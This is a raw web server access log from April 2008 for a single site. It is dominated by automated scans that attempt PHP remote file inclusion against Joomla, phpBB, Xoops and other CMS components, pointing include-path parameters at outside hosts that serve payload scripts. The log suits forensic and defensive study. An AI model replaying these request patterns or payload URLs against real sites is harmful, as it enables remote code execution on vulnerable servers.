74.52.9.218 - - [10/Apr/2008:11:15:33 -0700] "GET /logs/access_080201.log//modules.php?name=Forums&file=search&search_author=DDay/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.118.96.80 - - [10/Apr/2008:11:15:43 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:16:00 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.silak.eu//components/com_rwcard/alba.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:16:01 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.silak.eu//components/com_rwcard/alba.txt?????? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:16:01 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.silak.eu//components/com_rwcard/alba.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [10/Apr/2008:11:16:40 -0700] "GET /logs/access_080324.log///skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [10/Apr/2008:11:16:40 -0700] "GET ///skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [10/Apr/2008:11:16:41 -0700] "GET /logs///skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
70.244.197.249 - - [10/Apr/2008:11:17:25 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:11:17:31 -0700] "GET /logs/access_080308.log//modules/xoopsgallery/index.php?GALLERY_BASEDIR=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:11:17:32 -0700] "GET /logs//modules/xoopsgallery/index.php?GALLERY_BASEDIR=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:11:17:36 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/init.php?GALLERY_BASEDIR=http://csinfo.pl/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.151.239.80 - - [10/Apr/2008:11:17:52 -0700] "GET /logs/access_080129.log//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://203.71.212.3/www/modul/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.151.239.80 - - [10/Apr/2008:11:17:53 -0700] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://203.71.212.3/www/modul/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.151.239.80 - - [10/Apr/2008:11:17:53 -0700] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://203.71.212.3/www/modul/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:11:17:58 -0700] "GET /logs/access_080218.log//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:11:18:01 -0700] "GET //index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:11:18:02 -0700] "GET /logs//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:11:18:04 -0700] "GET /logs/access_080225.log//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [10/Apr/2008:11:18:22 -0700] "GET /logs/access_080129.log///skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.227.114.148 - - [10/Apr/2008:11:18:33 -0700] "GET /logs/access_071216.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.114.148 - - [10/Apr/2008:11:18:34 -0700] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.114.148 - - [10/Apr/2008:11:18:34 -0700] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.128.59.36 - - [10/Apr/2008:11:18:48 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.128.59.36 - - [10/Apr/2008:11:18:48 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.128.59.36 - - [10/Apr/2008:11:18:49 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.201.48.20 - - [10/Apr/2008:11:19:25 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.201.48.20 - - [10/Apr/2008:11:19:31 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.16.198.208 - - [10/Apr/2008:11:19:31 -0700] "GET /logs/access_080308.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:19:33 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:19:33 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:19:33 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.201.48.20 - - [10/Apr/2008:11:19:38 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:11:20:00 -0700] "GET /logs/access_080308.log//modules/xoopsgallery/index.php?GALLERY_BASEDIR=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:11:20:01 -0700] "GET /logs//modules/xoopsgallery/index.php?GALLERY_BASEDIR=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.220.4.204 - - [10/Apr/2008:11:20:22 -0700] "GET /logs/access_071225.loghttp://myownmarriage.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:11:20:28 -0700] "GET /logs/access_080308.log//modules/xoopsgallery/index.php?GALLERY_BASEDIR=http://csinfo.pl/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:11:20:29 -0700] "GET /logs//modules/xoopsgallery/index.php?GALLERY_BASEDIR=http://csinfo.pl/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:20:43 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:20:43 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:20:44 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.104.78.250 - - [10/Apr/2008:11:20:44 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://163.23.99.193/catalog/images/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
89.104.78.250 - - [10/Apr/2008:11:20:44 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://163.23.99.193/catalog/images/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
74.52.9.218 - - [10/Apr/2008:11:20:47 -0700] "GET //components/com_calendar.php?absolute_path=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:11:20:59 -0700] "GET /logs//modules/xoopsgallery/classes/gallery/UserDB.php?Gallery_UserDB=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.30.216.95 - - [10/Apr/2008:11:21:01 -0700] "GET /logs/access_080127.log HTTP/1.0" 200 672308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:21:08 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.151.239.80 - - [10/Apr/2008:11:21:21 -0700] "GET /logs/access_080329.log//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://203.71.212.3/www/modul/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.114.148 - - [10/Apr/2008:11:21:46 -0700] "GET /logs/access_071214.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.201.48.20 - - [10/Apr/2008:11:21:51 -0700] "GET /logs/access_080308.log//phpsecurityadmin/include/logout.php?PSA_PATH=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.97 - - [10/Apr/2008:11:22:04 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dt-support.com/hcl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:23:47 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:23:48 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:23:48 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:24:06 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:24:07 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:24:07 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:24:58 -0700] "GET /logs/access_080207.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.silak.eu//components/com_rwcard/alba.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.30.193 - - [10/Apr/2008:11:25:18 -0700] "GET //redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.12.116.5 - - [10/Apr/2008:11:25:26 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:25:42 -0700] "GET /logs/access_080219.log/!scanhttp://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:25:42 -0700] "GET /!scanhttp://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:25:42 -0700] "GET /logs/!scanhttp://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.54.40 - - [10/Apr/2008:11:25:51 -0700] "GET /blane/?D=A HTTP/1.0" 200 649 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:25:56 -0700] "GET /logs/access_080201.log/!scanhttp://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.16.198.208 - - [10/Apr/2008:11:25:56 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
76.16.198.208 - - [10/Apr/2008:11:25:56 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
76.16.198.208 - - [10/Apr/2008:11:25:56 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:11:25:58 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:11:25:58 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
61.47.47.48 - - [10/Apr/2008:11:26:08 -0700] "GET /logs/access_080118.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:26:52 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:26:52 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:26:52 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:11:26:52 -0700] "GET /logs/access_080308.log//modules/xoopsgallery/classes/gallery/UserDB.php?Gallery_UserDB=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:11:26:54 -0700] "GET /logs//modules/xoopsgallery/classes/gallery/UserDB.php?Gallery_UserDB=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:11:26:55 -0700] "GET /logs/access_080308.log//modules/xoopsgallery/classes/gallery/UserDB.php?Gallery_UserDB=http://csinfo.pl/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:11:26:56 -0700] "GET /logs//modules/xoopsgallery/classes/gallery/UserDB.php?Gallery_UserDB=http://csinfo.pl/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:27:21 -0700] "GET /logs/access_080117.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:27:21 -0700] "GET /logs/access_080211.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:27:21 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.16.198.208 - - [10/Apr/2008:11:27:21 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:27:21 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:27:21 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:27:21 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.244.197.249 - - [10/Apr/2008:11:27:26 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.244.197.249 - - [10/Apr/2008:11:27:26 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:27:35 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:27:35 -0700] "GET /logs/access_080308.log/index.php?redir=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:27:38 -0700] "GET /index.php?redir=http://66.153.86.221/www??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:27:39 -0700] "GET /logs/index.php?redir=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:27:51 -0700] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.97 - - [10/Apr/2008:11:27:59 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.76" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:28:05 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.244.197.249 - - [10/Apr/2008:11:28:09 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:28:30 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.51.170 - - [10/Apr/2008:11:28:50 -0700] "GET /blane/?D=D HTTP/1.0" 200 649 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.30.193 - - [10/Apr/2008:11:29:28 -0700] "GET /logs/access_080308.log//redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.30.193 - - [10/Apr/2008:11:29:28 -0700] "GET /logs//redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:29:41 -0700] "GET /logs/access_080312.log/index.php?redir=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:30:23 -0700] "GET /logs/access_080117.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:30:23 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:30:24 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [10/Apr/2008:11:30:27 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [10/Apr/2008:11:30:28 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [10/Apr/2008:11:30:29 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.19.146.161 - - [10/Apr/2008:11:31:09 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.216.89 - - [10/Apr/2008:11:31:23 -0700] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:11:31:39 -0700] "GET /logs/access_080308.log//codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:11:31:39 -0700] "GET /logs/access_080308.log//codebb/lang_select?phpbb_root_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:11:31:40 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:11:31:40 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:11:31:40 -0700] "GET /logs/access_080213.log//codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:11:31:41 -0700] "GET /logs/access_080213.log//codebb/lang_select?phpbb_root_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.9.218 - - [10/Apr/2008:11:31:59 -0700] "GET /logs/access_080226.log//components/com_calendar.php?absolute_path=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
